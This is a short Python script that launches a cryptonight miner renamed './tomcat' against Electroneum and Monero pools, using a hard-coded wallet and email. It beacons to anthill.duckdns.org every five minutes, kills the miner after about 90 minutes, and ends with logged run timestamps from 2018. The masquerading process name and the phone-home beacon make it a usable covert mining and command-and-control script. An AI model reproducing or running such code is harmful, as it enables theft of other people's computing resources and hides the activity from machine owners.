import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:32:01.575197
#2018-02-17 17:20:05.892495
#2018-02-17 19:08:06.130463
#2018-02-17 20:58:04.202652
#2018-02-17 22:43:05.986558
#2018-02-18 00:27:05.245007
#2018-02-18 02:18:01.630730
#2018-02-18 04:05:08.607689
#2018-02-18 05:57:04.289756
#2018-02-18 07:48:01.739912
#2018-02-18 09:36:06.079033
#2018-02-18 11:22:07.251668
#2018-02-18 13:08:07.048861
#2018-02-18 14:56:01.725118
#2018-02-18 16:44:02.131597
#2018-02-18 18:32:07.415300
#2018-02-18 20:20:04.850785
#2018-02-18 22:04:07.334259
#2018-02-18 23:53:05.143267
#2018-02-19 01:39:05.183268
#2018-02-19 03:27:05.476499
#2018-02-19 05:11:07.432692
#2018-02-19 06:58:04.891354
#2018-02-19 08:46:05.161344
#2018-02-19 10:37:02.102643
#2018-02-19 12:23:08.754927
#2018-02-19 14:11:01.725955
#2018-02-19 16:01:04.165706
#2018-02-19 17:49:04.193525
#2018-02-19 19:35:10.421280
#2018-02-19 21:22:07.202876
#2018-02-19 23:08:07.005910
#2018-02-20 00:53:06.080159
#2018-02-20 02:42:04.219076
#2018-02-20 04:31:06.400188
#2018-02-20 06:15:08.177062
#2018-02-20 08:01:01.928799
#2018-02-20 09:46:08.189975
#2018-02-20 11:30:06.102077
#2018-02-20 13:18:04.275188
#2018-02-20 15:04:06.961823
#2018-02-20 16:49:10.095579
#2018-02-20 18:38:04.591217
#2018-02-20 20:27:08.700009
#2018-02-20 22:14:04.852640
#2018-02-20 23:56:07.338768
#2018-02-21 01:42:09.747423
#2018-02-21 03:31:04.551171
#2018-02-21 05:19:02.094405
#2018-02-21 07:07:01.996248
#2018-02-21 08:53:01.953562
#2018-02-21 10:40:09.542826
#2018-02-21 12:29:08.047484
#2018-02-21 14:16:05.667073
#2018-02-21 16:03:05.159267
#2018-02-21 17:53:05.886157
#2018-02-21 19:40:06.622864
#2018-02-21 21:28:05.835860
#2018-02-21 23:13:07.459439
#2018-02-22 01:03:03.828794
#2018-02-22 02:50:05.596493
#2018-02-22 04:37:05.152098
#2018-02-22 06:22:05.424576
#2018-02-22 08:09:07.142522
#2018-02-22 09:57:08.110868
#2018-02-22 11:43:07.133560
#2018-02-22 13:29:06.751875
#2018-02-22 15:19:05.482504
#2018-02-22 17:04:05.074539
#2018-02-22 18:50:08.783271
#2018-02-22 20:42:08.507700
#2018-02-22 22:28:06.354127
#2018-02-23 00:12:07.507825
#2018-02-23 02:02:01.478405
#2018-02-23 03:48:01.390765
#2018-02-23 05:38:04.968061
#2018-02-23 07:22:07.336202
#2018-02-23 09:26:05.885707
#2018-02-23 11:31:07.687434
#2018-02-23 13:20:07.653908
#2018-02-23 15:05:10.198434
#2018-02-23 16:54:01.720892
#2018-02-23 18:43:07.169944
#2018-02-23 20:29:01.845859
#2018-02-23 22:16:07.246977
#2018-02-24 00:01:07.782334
#2018-02-24 01:52:05.322188
#2018-02-24 03:46:01.883214
#2018-02-24 05:33:06.274083
#2018-02-24 07:19:06.033500
#2018-02-24 09:09:06.727770
#2018-02-24 10:42:01.424773
#2018-02-24 12:28:05.869964
#2018-02-24 14:01:07.882635
#2018-02-24 15:38:03.746618
#2018-02-24 17:22:02.206627
#2018-02-24 18:56:05.321138
#2018-02-24 20:27:03.756078
#2018-02-24 21:56:07.329639
#2018-02-25 00:46:01.279261
#2018-02-25 02:44:01.477760
#2018-02-25 06:23:04.350782
#2018-02-25 11:39:07.542114